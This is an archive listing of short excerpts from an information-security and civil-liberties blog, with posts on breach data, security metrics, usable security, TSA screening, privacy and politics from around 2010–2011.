Science fiction author Walter John Williams wants to get his out of print work online so you can read it: To this end, I embarked upon a Cunning Plan. I discovered that my work had been pirated, and was available for free on BitTorrent sites located in the many outlaw server dens of former Marxist […]

 

A Few Data Points

First, for those who might have missed it, Google has released Google Refine, a free tool for cleaning dirty data sets.  It allows you to pull in disparate data, then organize and clean it for consistency. Next, some interesting thoughts on how “anonymized” data sets aren’t, and some thoughts on the implications of this from […]

 

Photoblogging CHI2011

Last week, I had the pleasure of attending the ACM conference on Computer Human Interaction, CHI. As I mentioned in a work blog post, “Adding Usable Security to the SDL,” I’m now focused on usable security issues at work. I’m planning to say more about the conference in a little bit, but for right now, […]

 

Heaven Forbid the New York Times include Atheists

In “Is Your Religion Your Financial Destiny?,” the New York Times presents the following chart of income versus religion: Note that it doesn’t include the non-religious, which one might think an interesting group as a control. Now, you might think that’s because the non-religious aren’t in the data set. But you’d be wrong. In the […]

 

Representative Bono-Mack on the Sony Hack

There’s a very interesting discussion on C-SPAN about the consumer’s right to know about breaches and how the individual is best positioned to decide how to react. “Representative Bono Mack Gives Details on Proposed Data Theft Bill.” I’m glad to see how the debate is maturing, and how no one bothered with some of the […]

 

The future of education is chaotic and fun

Lately, I’ve seen three interesting bits on the future of education, and I wanted to share some thoughts on what they mean. The first is a quickie by Don Boudreaux at Cafe Hayek, titled “Grocery School.” It starts “Suppose that we were supplied with groceries in the same way that we are supplied with K-12 education.” […]

 

New York memorials

There’s an excellent column in the old liberal tradition of celebrating liberty in this week’s New Yorker. It’s Memorials by Adam Gopnik, and includes a quote from John Stuart Mill at his rhetorical peak.

 
 

Quick Quotes For Your Morning

From Krugman (commentary is his): “Without metrics, you’re just another guy with an opinion. — Stephan Leschka, Hewlett Packard When I hear words from almost anyone about how their approach is better than some other approach, I think of this quote. And as Daniel Patrick Moynihan said: Every man is entitled to his own opinion, […]

 

Why Do Outsiders Detect Breaches?

So I haven’t had a chance to really digest the new DBIR yet, but one bit jumped out at me: “86% were discovered by a third party.” I’d like to offer up an explanatory story of why might that be, and muse a little on what it might mean for the deployment of intrusion detection […]

 

Data driven pen tests

So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques. What we could use are data-driven pen test reports. “We […]

 

VERIS Community Data

Seriously. Interesting.  Go check this out: http://securityblog.verizonbusiness.com/2011/04/12/veris-community-project-update/ Take a look, impact information!

 

Why Do You Write The Way You Do?

Hey Kids, Reader Mark Wallace wrote in a comment to the blog yesterday, and I wanted to answer the comment in an actual blog post. So here goes: — Mark, Thanks for reading! There’s a point where publicly writing forces me to answer a few questions that I’m not ready to make a quick decision […]

 

Happy Yuri's Night!

Today, April 12, 2011 is the 50th Anniversary of Yuri Gagarin’s historic first flight. Why not join a celebration? Invite to the Kremlin event via Xeni Jardin.

 

What is Risk (again)?

The thread “What is Risk?” came up on a linkedin Group. Thought you might enjoy my answer: ———————- Risk != uncertainty (unless you’re a Knightian frequentist, and then you don’t believe in measurement anyway), though if you were to account for risk in an equation, the amount of uncertainty would be a factor. risk != […]

 

What's the PIN, Kenneth?

There’s a story in the New York Times, “To Get In, Push Buttons, or Maybe Swipe a Magnet” which makes interesting allusions to the meaning of fair trade in locks, implied warranties and the need for empiricism in security: In court filings, Kaba argued that it had “never advertised or warranted in any way that […]

 
 

Ahem: The New School is more than Data

In “Why The New School Is Important,” Alex writes: Being New School won’t solve your problems. What a New School mindset will do for you is help you begin to understand what your problems actually are. So without arguing with the rest of Alex’s post, I’m forced to beg to differ. The New School is […]

 

Why The New School Is Important

I participated in another security metrics and risk discussion yesterday (yeah, me talk about metrics & risk –  you don’t say).  As part of this discussion someone echoed a sentiment I’ve been hearing more and more of recently.  A casual acceptance of the logic of metrics and data followed quickly by a dismissive, skeptical statement […]

 

NewSchool Zombies, Moneyball, & Metrics

Hey! Tomorrow at 1pm ET reg now: @joshcorman & I redux our (in)famous ‘Metrics are Bunk!?’ debate from RSAC 2011: http://bit.ly/i6z1BL

 

Hey! SourceBoston is going to be CRAZY!

Not crazy like Sammy-Hagar-has-clearly-abused-his-brain-and-it’s-giving-him-bad-information-to-come-out-of-his-mouth crazy, but crazy like, there-are-so-many-good-talks-you-can’t-possibly-not-get-value-out-of-the-conference crazy. For example, I’ll be talking twice. Once with Dan Geer and Greg Shannon about Prediction Markets in InfoSec. Then I’ll be giving one of THE FIRST EVER (!) debriefings of the 2011 DBIR (which is going to be crazy like both of the above). I’m […]

 

Microsoft Backs Laws Forbidding Windows Use By Foreigners

According to Groklaw, Microsoft is backing laws that forbid the use of Windows outside of the US. Groklaw doesn’t say that directly. Actually, they pose charmingly with the back of the hand to the forehead, bending backwards dramatically and asking, “Why Is Microsoft Seeking New State Laws That Allow it to Sue Competitors For […]

 

I'd like some of that advertising action

Several weeks back, I was listening to the Technometria podcast on “Personal Data Ecosystems,” and they talked a lot about putting the consumer in the center of various markets. I wrote this post then, and held off posting it in light of the tragic events in Japan. One element of this is the “VRM” or […]

 

Sedgwick, Maine versus the Feds

“Maine Town Declares Food Sovereignty, Nullifies Conflicting Laws.” So reads the headline at the 10th Amendment center blog: The Maine town of Sedgwick took an interesting step that brings a new dynamic to the movement to maintain sovereignty: Town-level nullification. Last Friday, the town passed a proposed ordinance that would empower the local level to […]

 

Back to You, Rob!

Rob is apparently confused about what risk management means. I tried to leave this as a comment, but apparently there are limitations in commenting. So here goes: Rob, Nowhere did I imply you were a bad pen tester. I just said that you should have a salient view of failure in complex systems (which […]

 

Actually It *IS* Too Early For Fukushima Hindsight

OR – RISK ANALYSIS POST-INCIDENT, HOW TO DO IT RIGHT Rob Graham called me out on something I retweeted here (seriously, who calls someone out on a retweet?  Who does that?): http://erratasec.blogspot.com/2011/03/fukushima-too-soon-for-hindsight.html And that’s cool, I’m a big boy, I can take it.  And Twitter doesn’t really give you a means to explain why you […]

 

What does Coviello's RSA breach letter mean?

After spending a while crowing about the ChoicePoint breach, I decided that laughing about breaches doesn’t help us as much as analyzing them. In the wake of RSA’s recent breach, we should give them time to figure out what happened, and look forward to them fulfilling their commitment to share their experiences. Right now we […]

 

Questions about a Libyan no-fly zone

With the crisis in Japan, attention to the plight of those trying to remove Colonel Kaddafi from power in Libya has waned, but there are still calls, including ones from the Arab League, to impose a no-fly zone. Such a zone would “even the fight” between the rebels and Kaddafi’s forces. There are strong calls […]

 

Copyrighted Science

In “Shaking Down Science,” Matt Blaze takes issue with academic copyright policies. This is something I’ve been meaning to write about since Elsevier, a “reputable scientific publisher,” was caught publishing a full line of fake journals. Matt concludes: So from now on, I’m adopting my own copyright policies. In a perfect world, I’d simply refuse […]

 

SIRA Meeting! THURSDAY

THURSDAY, THURSDAY, THURSDAY!!!!!!! Hi everyone! SIRA’s March monthly webinar is this Thursday, March 10th from 12-1 PM EST. We are excited to have Mr. Nicholas Percoco, Head of SpiderLabs at Trustwave, talk to us about the 2011 Trustwave Global Security Report. Block off your calendars now! Hello, Alexander Hutton invites you to attend this […]

 

Fear, Information Security, and a TED Talk

In watching this TEDMed talk by Thomas Goetz, I was struck by what a great lesson it holds for information security. You should watch at least the first 7 minutes or so. (The next 9 minutes are interesting, but less instructive for information security.) The key lesson that I’d like you to take from this […]

 

Measurement Priorities

Seth Godin asks an excellent question: Is something important because you measure it, or is it measured because it’s important? I find that we tend to measure what we can, rather than working toward being able to measure what we should, in large part because some variation of this question is not asked. I’m going […]

 

Fixes to Wysopal’s Application Security Debt Metric

In two recent blog posts (here and here), Chris Wysopal (CTO of Veracode) proposed a metric called “Application Security Debt”.  I like the general idea, but I have found some problems in his method.  In this post, I suggest corrections that will be both more credible and more accurate, at least for half of the […]

 
 

Unmeddle Housing More

Last month, I wrote: But after 50 years of meddling in the market, reducing the support for housing is going to be exceptionally complex and chaotic. And the chaos isn’t going to be evenly distributed. It’s going to be a matter of long, complex laws whose outcomes are carefully and secretly influenced. Groups who aren’t […]

 

Best Practices for the Lulz

The New School blog will shortly be publishing a stunning expose of Anonymous, and before we do, we’re looking for security advice we should follow to ensure our cloud-hosted blog platform isn’t pwned out the wazoo. So, where’s the checklist of all best practices we should be following? What’s that you say? There isn’t a […]

 

Is Norton Cybercrime Index just 'Security Metrics Theater'?

Symantec’s new Norton Cybercrime Index looks like it is mostly a marketing tool. They present it as though there is solid science, data, and methods behind it, but an initial analysis shows that this is probably not the case. The only way to have confidence in this is if Symantec opens up about their algorithms and data.

 

Police Officers should be able to speak out

I got this in email and wanted to amplify it: Law Enforcement Against Prohibition prides itself on the willingness of our members to stand up and take action against drug prohibition. Last fall, LEAP member Joe Miller did exactly that. A California police officer for eight years before taking a position as a deputy probation […]

 

SIRA Meeting Today at Noon EST! >> RICH MOGULL

HEY Y’ALL @securosis’ own @rmogull for today’s “al desco” SIRA meeting.  Details, details: SIRA’s February monthly online meeting is TODAY; February 10th from 12-1 PM EST. We are excited to have Mr. Rich Mogull from Securosis talk to us with a behind-the-scene look at Securosis’ “2010 Data Security Survey”. Block off your calendars now! The […]

 

Would a CISO benefit from an MBA education?

If a CISO is expected to be an executive officer (esp. for a large, complex technology- or information-centered organization), then he/she will need MBA-level knowledge and skill. An MBA is one path to getting those skills, at least if you are thoughtful and selective about the school you choose. Other paths are available, so it’s not just about an MBA credential.

Otherwise, if a CISO is essentially the Most Senior Information Security Manager, then MBA education wouldn’t be of much value.

 

Elevation of Privilege (Web Edition) Question

Someone wrote to me to ask: A few cards are not straightforward to apply to a webapp situation (some seem to assume a proprietary client) – do you recommend discarding them or perhaps you thought of a way to rephrase them somehow? For example: “An attacker can make a client unavailable or unusable but the problem […]

 

What should a printer print?

Over at their blog, i.Materialise (a 3D printing shop) brags about not taking an order. The post is “ATTENTION: ATM skimming device.” It opens: There is no doubt that 3D printing is a versatile tool for materializing your 3D ideas. Unfortunately, those who wish to break the law can also try to use our technology. […]

 

Infosec's Flu

In “Close Look at a Flu Outbreak Upends Some Common Wisdom,” Nicholas Bakalar writes: If you or your child came down with influenza during the H1N1, or swine flu, outbreak in 2009, it may not have happened the way you thought it did. A new study of a 2009 epidemic at a school in Pennsylvania […]

 
 

Egypt and Information Security

Yesterday, I said on Twitter that “If you work in information security, what’s happening in Egypt is a trove of metaphors and lessons for your work. Please pay attention.” My goal is not to say that what’s happening in Egypt is about information security, but rather to say that we can be both professional and […]

 

Self Promotion: A Little Interview about Alex @ RSA

Self Promotion time, sorry for the spam, but I think the stuff I’ll be participating in at RSA is pretty NewSchool.  Here’s an interview that talks about both of the things I’ll be doing and you can see if they’ll be interesting: http://itacidentityblog.com/rsa-podcast-alex-hutton-principal-in-research-and-risk-intelligence-verizon-business

 

Mubarak and TSA agree: No advantage to them leaving

In “TSA shuts door on private airport screening program,” CNN reports that “TSA chief John Pistole said Friday he has decided not to expand the program beyond the current 16 airports, saying he does not see any advantage to it.” The advantage, of course, is that it generates pressure on his agency to do better. […]

 

Another critique of Ponemon's method for estimating 'cost of data breach'

I have fundamental objections to Ponemon’s methods used to estimate ‘indirect costs’ due to lost customers (‘abnormal churn’) and the cost of replacing them (‘customer acquisition costs’). These include sloppy use of terminology, mixing accounting and economic costs, and omitting the most serious cost categories.

 

A critique of Ponemon Institute methodology for "churn"

Both Dissent and George Hulme took issue with my post Thursday, and pointed to the Ponemon U.S. Cost of a Data Breach Study, which says: Average abnormal churn rates across all incidents in the study were slightly higher than last year (from 3.6 percent in 2008 to 3.7 percent in 2009), which was measured by […]

 

Requests for a proof of non-existence

So before I respond to some of the questions that my “A day of reckoning” post raises, let me say a few things. First, proving that a breach has no impact on brand is impossible, in the same way that proving the non-existence of god or black swans is impossible. It will always be possible […]

 

Gunnar on Heartland

Analysis of Heartland’s business as a going concern by @oneraindrop. Especially interesting after comments on the CMO video.

 

A Day of Reckoning is Coming

Over at The CMO Site, Terry Sweeney explains that “Hacker Attacks Won’t Hurt Your Company Brand.” Take a couple of minutes to watch this. Let me call your attention to this as a turning point for a trend. Those of us in the New School have been saying this for several years, but the idea […]

 

A few thoughts on chaos in Tunisia

The people of Tunisia have long been living under an oppressive dictator who’s an ally of the US in our ‘war on terror.’ Yesterday, after substantial loss of life, street protests drove the dictator to abdicate. There’s lots of silly technologists claiming it was twitter. A slightly more nuanced comment is in “Sans URL” Others, […]

 

I have a dream

It’s MLK Day. Here’s a pdf of the speech. Or watch it online:

 

Gunnar's Flat Tax: An Alternative to Prescriptive Compliance?

Hey everybody! I was just reading Gunnar Peterson’s fun little back of the napkin security spending exercise, in which he references his post on a security budget “flat tax” (Three Steps To A Rational Security Budget).  This got me to thinking a bit  – What if, instead of in the world of compliance where we […]

 

Dashboards are Dumb

The visual metaphor of a dashboard is a dumb idea for management-oriented information security metrics. It doesn’t fit the use cases and therefore doesn’t support effective user action based on the information. Dashboards work when the user has proportional controllers or switches that correspond to each of the ‘meters’ and the user can observe the effect of using those controllers and switches in real time by observing the ‘meters’. Dashboards don’t work when there is a loose or ambiguous connection between the information conveyed in the ‘meters’ and the actions that users might take. Other visual metaphors should work better.

 

Unmeddling Housing

For a great many years, US taxpayers have been able to deduct interest paid on a home mortgage from their taxes. That made owning property cost roughly 20% less than it otherwise would have (estimating a 25% tax rate on interest on 80% of a property). So everyone could afford 20% “more” house, which meant […]

 

Referencing Insiders is a Best Practice

You might argue that insiders are dangerous. They’re dangerous because they’re authorized to do things, and so monitoring throws up a great many false positives, and raises privacy concerns. (As if anyone cared about those.) And everyone in information security loves to point to insiders as the ultimate threat. I’m tempted to claim this as […]

 

TSA News Roundup

Event: The Carnegie Institute for Science will be hosting “The Stripping of Freedom: A Careful Scan of TSA Security Procedures” Outrage: “SFO pilot exposes airport security flaws.” Apparently, pilots allowed to carry guns give up their free speech rights “causes the loss of public confidence in TSA…” (does anyone have a copy of the letter?) […]

 

CRISC – The Bottom Line (oh yeah, Happy New Year!)

No doubt my “Why I Don’t Like CRISC” blog post has created a ton of traffic and comments.  Unfortunately, I’m not a very good writer because the majority of readers miss the point.  Let me try again more succinctly: Just because you can codify a standard or practice doesn’t mean that this practice is sane. […]

 

So cute!

There’s just something about skinny girls in pouffy skirts…and stormtrooper helmets. More at http://redandjonny.tumblr.com/

 

Bureaucracy in inaction

Back in September, a group of Czech artists called EPOS 257 camouflaged themselves as city-workers, went to the Palackeho square in Prague and installed a fence. The fence was left on the square with no apparent intent or explanation. At first, the city council didn’t know about it, and when they were told, they didn’t […]

 

Emergent Chaos has TSA "trolls," too

Over at We Won’t Fly, George Donnelly writes: I was about to delete an offensive comment on this blog – one of the very few we get – and thought, hmm, I wonder where this guy is posting from? Because, really, it is quite unusual for us to get nasty comments. Lo and behold, the […]

 

The Only Trust Models You'll Ever Need

Lately there has been quite a bit of noise about the concept of “trust” in information security.  This has always confused me, because I tend towards @bobblakley when he says: “trust is for suckers.” But security is keen on having trendy new memes, things to sell you, and I thought that I might as well […]

 

TSA News roundup

Act: Get this 2-page Passenger’s Rights Sheet: http://saizai.com/tsa_rights.pdf Outrage: “Gaping Holes in Airline Security: Loaded Gun Slips Past TSA Screeners” (Matthew Mosk, Angela Hill and Timothy Fleming, ABC News) “TSA + Police + JetBlue Conspire Against Peaceful Individual at JFK” (George Donnelly, WeWontFly.org) “TSA Lies Again Over Capture, Storage Of Body Scanner Images” (Steve Watson, […]

 

The Emergent Chaos of Facebook relationships

This is a fascinating visualization of 10MM Facebook Friends™ as described in Visualizing Friendships by Paul Butler. A couple of things jump out at me in this emergent look at geography. The first is that Canada is a figment of our imaginations. Sorry to my Canadian friends (at least the anglophones!) The second is that […]

 

Managing WordPress: How to stay informed?

We at the New School blog use WordPress with some plugins. Recently, Alex brought up the question of how we manage to stay up to date. It doesn’t seem that WordPress has a security announcements list, nor do any of our plugins. So I asked Twitter “What’s the best way to track security updates for […]

 

Armoring the Bombers that Came Back

Paul Kedrosky writes: Most of us have heard the story of armoring British bombers, as it’s too good not to share, not to mention being straight from the David Brent school of management motivation. Here is the Wikipedia version: Bomber Command’s Operational Research Section (BC-ORS), analysed a report of a survey carried out by RAF […]

 

Nate Silver in the NYT: A Bayesian Look at Assange

From The Fine Article: Under these circumstances, then, it becomes more likely that the charges are indeed weak (or false) ones made to seem as though they are strong. Conversely, if there were no political motivation, then the merits of the charges would be more closely related to authorities’ zealousness in pursuing them, and we […]

 

Can't measure love

But you can still evaluate the quality of the effort. Likewise, there’s a lot that you can’t measure about security and risk, but you can still infer something from how the effort is pursued.

 

TSA News roundup

Intrusiveness and outrage: “Homeland Security Is Also Monitoring Your Tweets” “‘Baywatch’ Beauty Feels Overexposed After TSA Scan” (David Moye, AOLnews) “the agent responded, ‘Because you caught my eye, and they’ — pointing to the other passengers — ‘didn’t.’” “POLICE STATE – TSA, Homeland Security & Tampa Police Set Up Nazi Checkpoints At Bus Stations ” […]

 

"Proof" that E-Passports Lead to ID Theft

A couple of things caught Stuart Schechter’s eye about the spam to which this image was attached, but what jumped out at me was the name on the criminal’s passport: Frank Moss, former deputy assistant secretary of state for passport services, now of Identity Matters, LLC. And poor Frank was working so hard to claim […]

 

Lazy Sunday, Lazy Linking

Hey, remember when blogging was new and people would sometimes post links instead of making “the $variable Daily” out of tweets?  Well even though I’m newschool with the security doesn’t mean I can’t kick it oldschool every so often.  So here are some links I thought you might enjoy, probably worth discussion and review even […]

 

The TSA’s Approach to Threat Modeling

“I understand people’s frustrations, and what I’ve said to the TSA is that you have to constantly refine and measure whether what we’re doing is the only way to assure the American people’s safety. And you also have to think through are there other ways of doing it that are less intrusive,” Obama said. “But […]

 

The 1st Software And Usable Security Aligned for Good Engineering (SAUSAGE) Workshop

National Institute of Standards and Technology Gaithersburg, MD USA April 5-6, 2011 Call for Participation The field of usable security has gained significant traction in recent years, evidenced by the annual presentation of usability papers at the top security conferences, and security papers at the top human-computer interaction (HCI) conferences. Evidence is growing that significant […]

 

District 9

I really enjoyed District 9. Thought I understood some of it. But that was before I read “becoming the alien: apartheid, racism and district 9” by Andries du Toit. Now I need to watch the movie again.

 

Estimating spammer's technical capabilities and pathways of innovation

I’d like some feedback on my data analysis, below, from anyone who is an expert on spam or anti-spam technologies. I’ve analyzed data from John Graham-Cumming’s “Spammers’ Compendium” to estimate the technical capabilities of spammers and the evolution path of innovations.

 

Repeal Day Rant

Rachel Tayse over at Hounds In The Kitchen, has an awesome Repeal Day Rant on why repeal day isn’t as good as it sounds. Yet again I feel a lot less free.

 
 

Risk & Metrics Interview over Twitter Today at 3pm EST

HEY! – At 3pm today Alex (@alexhutton) will be doing an interview over the twitters with Dark Reading’s (@DarkReading) Kelly Jackson Higgins (@kjhiggins). Follow along with the hashtag #verizonDR! We’ll be talking risk, metrics, data – you know, the new school-y stuff.

 

"Towards Better Usability, Security and Privacy of Information Technology"

“Towards Better Usability, Security and Privacy of Information Technology” is a great survey of the state of usable security and privacy: Usability has emerged as a significant issue in ensuring the security and privacy of computer systems. More-usable security can help avoid the inadvertent (or even deliberate) undermining of security by users. Indeed, without sufficient […]

 

Grope-a-thon: Today's TSA roundup

Outrage “Adam Savage: TSA saw my junk, missed 12″ razor blades” (Ben Kuchera, Ars Technica with video) “DHS & TSA: Making a list, checking it twice” (Doug Hadmann, Canada Free Press) claims that DHS has an internal memo calling those 59% of Americans who oppose pat downs “domestic extremists.” No copies of the memo have […]

 

What is Information Security: New School Primer

Recently, I’ve heard some bits and pieces about how Information Security (InfoSec) can be “threat-centric” or “vulnerability-centric”. This struck me as funny for a number of reasons, mainly because it showed a basic bias towards what InfoSec *is*. And to me, InfoSec is too complex to be described as “threat-centric” or “vulnerability-centric” and yet still simple enough […]

 

Israeli Draft, Facebook and Privacy

A senior officer said they had found examples of young women who had declared themselves exempt posting photographs of themselves on Facebook in immodest clothing, or eating in non-kosher restaurants. Others were caught by responding to party invitations on Friday nights – the Jewish Sabbath. (“Israeli army uses Facebook to expose draft dodgers,” Wyre Davies, […]

 
 

Happy Birthday, Stan

“baseball’s rich in wonderful statistics, but it’s hard to find one more beautiful than Stan Musial’s hitting record.” – George Will “When you first hear about this guy, you say, ‘it can’t be true.’ When you first meet him you say, ‘It must be an act.’ But as you watch him and watch him and […]

 

News Round Up: New blog edition

I’ll be contributing to a new group blog, “I will opt out“. I think that concentrating and combining resources will help the people who care find all the news they want. My first post is at “More news from around the web”

 

Animals and Engineers

It’s been hard to miss the story on cat tongues (“For Cats, a Big Gulp With a Touch of the Tongue”): Writing in the Thursday issue of Science, the four engineers report that the cat’s lapping method depends on its instinctive ability to calculate the balance between opposing gravitational and inertial forces. …After calculating things […]

 

Games and The New School

On my work (“Microsoft Security Development Lifecycle”) blog, I’ve posted “Make Your Own Game! (My BlueHat lightning talk).”

 

Grope up: Enough is Enough edition

Analysis: “‘Strip-or-Grope’ vs. Risk Management” Jim Harper, Cato@Liberty blog. Really solid thinking, although I usually don’t like asset-centric approaches, I think that for the physical world they make more sense than they do in software threat modeling. TSA more likely to kill you than a terrorist. thread at Flyertalk (thanks Doug!) “Has Airport Security Gone […]

 

Daily Grope Up

Outrage: Transcript: Senate hearing on TSA, full-body scanners (yesterday, not one Senator cared.) Today’s hearing: http://www.c-span.org/Watch/C-SPAN3.aspx TSA Success Story (You can win in line.) If someone had done that to me at a nightclub I’d call the cops. Violated Traveling with scars Search this one for “pump” to learn about a diabetic’s experience. What would […]

 

You are being tracked

In this instance, it’s for science, helping a friend do some work on analyzing web traffic. If you don’t like it, please install software that blocks these 1 pixel images from tracking you. Edit: removed the web bug

 

Visualization for Gunnar's "Heartland Revisited"

You may have heard me say in the past that one of the more interesting aspects of security breaches, for me at least, is the concept of reputation damage.  Maybe that’s because I heard so many sales tactics tied to defacement in the 90’s, maybe because it’s so hard to actually quantify brand equity and […]

 

It's time to call your Senator!

There’s no news roundup today, the stories are flying, unlike people, who are sick and tired of the indignities, the nudeatrons and the groping. If you want to see them, you can follow me on twitter or National Opt Out day Tomorrow, there’s a Transportation Security Administration Oversight Hearing whose only witness is TSA Administrator […]

 

Daily Grope-Up: The Groping Will Continue Until You Drive Edition

“‘Naked’ scanners at U.S. airports may be dangerous: scientists” (National Post) The head of the X-ray lab at Johns Hopkins says “statistically, someone is going to get skin cancer from these X-rays.” “DHS chief tells pilot, tourism reps scans and patdowns will continue” (Infowars.com) includes link to a CNN story “Growing backlash against TSA […]

 

VERIS Community Incident Reporting

PEOPLE OF EARTH – The VERIS Community Application is out: Announcement here:  http://bit.ly/cDAUhy  Website here:  http://bit.ly/9dZwEJ  From Wade’s announcement: If the VERIS framework describes what information should be shared, the VERIS application provides how to actually share it. Anyone wishing to classify and report an incident can do so responsibly and anonymously using the application. In taking […]

 

Today's TSA news grope-up

“Terror chief tries to board plane with banned liquids” (Mirror, UK) Obviously, the UK needs to get with the TSA program and exempt Ministers from search. Flight attendants union upset over new pat-down procedures “Airport security reaches new levels of absurdity” (Salon’s Ask the Pilot blog) “Know Your Options at the Airport” (ACLU of Massachusetts) […]

 

Facebook and "your" photos

Facebook Changes Photo Memories to No Longer Show Your Ex-Boyfriends or Ex-Girlfriends: In response to numerous complaints, Facebook has changed its Photo Memories sidebar module to no longer display friends who a user was formally listed as in a relationship with. [Sic] But it’s not just about selective remembering because “Your Memories Will Be Rewritten.” […]

 

Flaw Of Averages – Society of Information Risk Analysts Meeting

Another friendly reminder: Alexander Hutton invites you to attend this online meeting. Topic: RISK ANALYST MEETING Date: Thursday, November 11, 2010 Time: 12:00 pm, Eastern Standard Time (New York, GMT-05:00) Meeting Number: 749 697 377 Meeting Password: riskisswell ——————————————————- To join the online meeting (Now from iPhones and other Smartphones too!) ——————————————————- 1. Go to […]

 

Ambrose Bierce Punks Richard Feynman

Via Boing Boing, where Maggie Koerth-Baker gave a delightful pointer to this film of Feynman explaining for seven-and-a-half minutes why he can’t really explain why magnets repel each other. Or attract, either. And trumping him in time and space, Bierce gave us this in 1906: MAGNET, n. Something acted upon by magnetism. MAGNETISM, n. Something […]

 

TSA Body Scanning is COMPLETELY SAFE… unless

Body scanners that the TSA is basically encouraging use of by threatening to otherwise grope, fondle, or molest you or your children are basically perfectly safe.  Well, unless you happen to be any one of the following: a woman at risk to breast cancer a pregnant woman an immunocompromised individual (HIV and cancer patients) a […]

 

SIRA Meeting Thursday – Flaw Of Averages

Hey everyone.  The Society of Information Risk Analysts (SIRA) would like to invite you to our November meeting this Thursday at 12 noon EST. Here’s a link to a meeting invite: http://bit.ly/d7IHn7 This month, we’ll have Sam Savage, author of the excellent book, The Flaw Of Averages join us.  He’ll be talking about the book […]

 

UC San Francisco Faculty on Nudatrons

A number of faculty at UCSF have a letter to John Holdren, the President’s advisor on science and technology. There’s a related story on NPR.org, but I’d missed the letter. It appears the concerns of 3 members of the National Academy of Sciences have been completely ignored.

 
 

Note on Design of Monitoring Systems

Dissent reports “State Department official admits looking at passport files for more than 500 celebrities.” A passport specialist curious about celebrities has admitted she looked into the confidential files of more than 500 famous Americans without authorization. This got me thinking: how does someone peep at 500 files before anyone notices? What’s wrong with the […]

 

Be celebratory, be very celebratory

A reminder for those of you who haven’t read or watched “V for Vendetta” one time too many, it’s Guy Fawkes Day today: The plan was to blow up the House of Lords during the State Opening of Parliament on 5 November 1605… …Fawkes, who had 10 years of military experience fighting in the Spanish Netherlands in […]

 

Cloudiots on Parade

UPDATE: Should have known Chris Hoff would have been all over this already. From the Twitter Conversation I missed last night: Chris, I award you an honorary NewSchool diploma for that one. ——————————————————————————- From:  Amazon Says Cloud Beats Data Center Security where Steve Riley says, “in no uncertain terms: it’s more secure there than in […]

 

TSA Body Scanners News: Why show ID edition

First, a quick news roundup: EPIC is suing DHS for improper rulemaking, violations of the fourth amendment, the privacy act, the religious freedom restoration act, and the video voyeurism prevention act. The ACLU has a news roundup and a form to report on TSA behavior. The Airline Pilots Association advises pilots to show resistance. So […]

 

Turning off the lights: Chaos Emerges.

See what happened when Portishead, England turned off their traffic lights in September 2009 in this video. And don’t miss “Portishead traffic lights set to stay out after trial” in the Bristol Evening Post.

 
 

TSA: Let us Take Nekkid Pics of You Or You Get "Bad Touch"

Apparently, the TSA is now protecting us so well that they make women cry by touching them inappropriately. According to (CNN Employee Rosemary) Fitzpatrick, a female screener ran her hands around her breasts, over her stomach, buttocks and her inner thighs, and briefly touched her crotch. “I felt helpless, I felt violated, and I felt […]

 

"My little piece of privacy"

Very entertaining video: I love it because curtains are privacy people will pay for, but even more, because, ironically for a privacy-enhancing technology, it generates more attention than not using it.

 

It's not TSA's fault

October 18th’s bad news for the TSA includes a pilot declining the choice between aggressive frisking and a nudatron. He blogs about it in “Well, today was the day:” On the other side I was stopped by another agent and informed that because I had “opted out” of AIT screening, I would have to go […]

 

Collective Smarts: Diversity Emerges

Researchers in the United States have found that putting individual geniuses together into a team doesn’t add up to one intelligent whole. Instead, they found, group intelligence is linked to social skills, taking turns, and the proportion of women in the group. […] “We didn’t expect that the proportion of women would be a significant […]

 

A Letter from Sid CRISC – ious

In the comments to “Why I Don’t Like CRISC” where I challenge ISACA to show us in valid scale and in publicly available models, the risk reduction of COBIT adoption, reader Sid starts to get it, but then kinda devolves into a defense of COBIT or something.  But it’s a great comment, and I wanted […]

 

Seriously? Are We Still Doing this Crap? (RANT MODE = 1)

These days I’m giving a DBIR presentation that highlights the fact that SQLi is 10 years old, and yet is still one of the favorite vectors for data breaches. And while CISOs love it when I bring this fact up in front of their dev. teams, in all deference to software developers and any ignorance […]

 

Re-architecting the internet?

Information Security.com reports that: [Richard Clarke] controversially declared “that spending more money on technology like anti-virus and IPS is not going to stop us losing cyber-command. Instead, we need to re-architect our networks to create a fortress. Let’s spend money on research to create a whole new architecture, which will cost just a fraction of […]

 

Another personal data invariant that varies

Just about anything a database might store about a person can change. People’s birthdays change (often because they’re incorrectly reported or recorded). People’s gender can change. One thing I thought didn’t change was blood type, but David Molnar pointed out to me that I’m wrong: Donors for allogeneic stem-cell transplantation are selected based on their […]

 

Money is information coined

In the general case, you are not anonymous on the interweb, but economically-anonymous, which I propose to label “enonymous”, and that’s not the same thing at all. If you threaten to kill the President, you will be tracked down, and the state will spend the money it takes on it. But if you call Lily […]

 

Call for Questions: 451 & Verizon DBIR Webinar

Hey everyone. I wanted to mention that Josh Corman of the 451 Group has graciously decided to make a webinar with me on the Data Breach Investigations Report , and has even made the webinar open to the public. So as such, Josh is collecting questions ahead of time.  If you want to submit some […]

 

Java Security & Criminals

Brian Krebs has an interesting article on “Java: A Gift to Exploit Pack Makers.” What makes it interesting is that since information security professionals share data so well, Brian was able to go to the top IDS makers and get practical advice on what really works to secure a system. Sorry, dreaming there for a […]

 

Society Of Information Risk Analysts (SIRA) Meeting Thursday!

HEY! SIRA Meeting on Thursday – click here for a calendar invite/reminder thingy/.ics file -> http://bit.ly/b5RKl9 In long format: Topic: SIRA RISK OCT – SANS! Date: Thursday, October 14, 2010 Time: 10:30 am, Eastern Daylight Time (New York, GMT-04:00) Meeting Number: 745 433 825 Meeting Password: sira ——————————————————- To join the online meeting (Now from […]

 

Lessons from HHS Breach Data

PHIPrivacy asks “do the HHS breach reports offer any surprises?” It’s now been a full year since the new breach reporting requirements went into effect for HIPAA-covered entities. Although I’ve regularly updated this blog with new incidents revealed on HHS’s web site, it might be useful to look at some statistics for the first year’s […]

 
 
 

Free Hossein Derakhshan

Apparently, the Iranian Government has sentenced Hossein “Hoder” Derakhshan to 19.5 years in jail for “collaborating with enemy states, creating propaganda against the Islamic regime, insulting religious sanctity, and creating propaganda for anti-revolutionary groups.” If you think putting bloggers or journalists in jail is wrong, please, please take a moment to sign the petition to […]

 

Wrong bra, no bra: Jail bars lawyer

